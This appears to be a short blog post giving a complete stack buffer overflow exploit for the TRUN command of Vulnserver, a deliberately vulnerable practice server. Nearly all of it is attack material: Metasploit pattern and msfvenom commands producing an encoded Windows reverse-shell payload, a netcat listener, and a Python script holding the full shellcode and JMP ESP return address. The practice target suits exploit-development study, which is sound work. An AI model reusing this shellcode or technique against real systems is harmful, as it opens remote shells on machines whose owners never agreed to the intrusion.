Saturday, 25 August 2018

Vulnserver.exe – TRUN command buffer overflow exploit


Commands:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5040
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 386f4337
!mona jmp -r esp
msfvenom -a x86 –platform Windows -p windows/shell_reverse_tcp LHOST=192.168.85.136 LPORT=4444 -e x86/shikata_ga_nai -b ‘\x00’ -f python
nc -nlvp 4444


#!/usr/bin/python
import socket
import os
import sys
host="192.168.2.135"
port=9999
buffer = "TRUN /.:/" + "A" * 5050
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()
----------------------------------------------------------------------------------------------------------------------
































7C941EED   FFE4             JMP ESP
\xed\x1e\x94\x7c

buffer = "TRUN /.:/" + "A" * 2003 + "\xed\x1e\x94\x7c" + "\x90" * 16 +  buf + "C" * (5060 - 2003 - 4 - 16 - len(buf))








------------------------------------------------------------------------------------------------------------------------------
#!/usr/bin/python

import socket
import os
import sys

host="192.168.85.136"
port=9999

buf =  ""
buf += "\xba\x43\x68\xa7\xb9\xdb\xcb\xd9\x74\x24\xf4\x5f\x31"
buf += "\xc9\xb1\x52\x31\x57\x12\x03\x57\x12\x83\xac\x94\x45"
buf += "\x4c\xce\x8d\x08\xaf\x2e\x4e\x6d\x39\xcb\x7f\xad\x5d"
buf += "\x98\xd0\x1d\x15\xcc\xdc\xd6\x7b\xe4\x57\x9a\x53\x0b"
buf += "\xdf\x11\x82\x22\xe0\x0a\xf6\x25\x62\x51\x2b\x85\x5b"
buf += "\x9a\x3e\xc4\x9c\xc7\xb3\x94\x75\x83\x66\x08\xf1\xd9"
buf += "\xba\xa3\x49\xcf\xba\x50\x19\xee\xeb\xc7\x11\xa9\x2b"
buf += "\xe6\xf6\xc1\x65\xf0\x1b\xef\x3c\x8b\xe8\x9b\xbe\x5d"
buf += "\x21\x63\x6c\xa0\x8d\x96\x6c\xe5\x2a\x49\x1b\x1f\x49"
buf += "\xf4\x1c\xe4\x33\x22\xa8\xfe\x94\xa1\x0a\xda\x25\x65"
buf += "\xcc\xa9\x2a\xc2\x9a\xf5\x2e\xd5\x4f\x8e\x4b\x5e\x6e"
buf += "\x40\xda\x24\x55\x44\x86\xff\xf4\xdd\x62\x51\x08\x3d"
buf += "\xcd\x0e\xac\x36\xe0\x5b\xdd\x15\x6d\xaf\xec\xa5\x6d"
buf += "\xa7\x67\xd6\x5f\x68\xdc\x70\xec\xe1\xfa\x87\x13\xd8"
buf += "\xbb\x17\xea\xe3\xbb\x3e\x29\xb7\xeb\x28\x98\xb8\x67"
buf += "\xa8\x25\x6d\x27\xf8\x89\xde\x88\xa8\x69\x8f\x60\xa2"
buf += "\x65\xf0\x91\xcd\xaf\x99\x38\x34\x38\x66\x14\x63\x35"
buf += "\x0e\x67\x8b\x54\x93\xee\x6d\x3c\x3b\xa7\x26\xa9\xa2"
buf += "\xe2\xbc\x48\x2a\x39\xb9\x4b\xa0\xce\x3e\x05\x41\xba"
buf += "\x2c\xf2\xa1\xf1\x0e\x55\xbd\x2f\x26\x39\x2c\xb4\xb6"
buf += "\x34\x4d\x63\xe1\x11\xa3\x7a\x67\x8c\x9a\xd4\x95\x4d"
buf += "\x7a\x1e\x1d\x8a\xbf\xa1\x9c\x5f\xfb\x85\x8e\x99\x04"
buf += "\x82\xfa\x75\x53\x5c\x54\x30\x0d\x2e\x0e\xea\xe2\xf8"
buf += "\xc6\x6b\xc9\x3a\x90\x73\x04\xcd\x7c\xc5\xf1\x88\x83"
buf += "\xea\x95\x1c\xfc\x16\x06\xe2\xd7\x92\x36\xa9\x75\xb2"
buf += "\xde\x74\xec\x86\x82\x86\xdb\xc5\xba\x04\xe9\xb5\x38"
buf += "\x14\x98\xb0\x05\x92\x71\xc9\x16\x77\x75\x7e\x16\x52"



buffer = "TRUN /.:/" + "A" * 2003 + "\xed\x1e\x94\x7c" + "\x90" * 16 +  buf + "C" * (5060 - 2003 - 4 - 16 - len(buf))


#buffer = "TRUN /.:/" + "A" * 2003 + "\xed\x1e\x94\x7c" + "C" * (5060 - 2003 - 4)
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)

expl.close()

No comments:

Post a Comment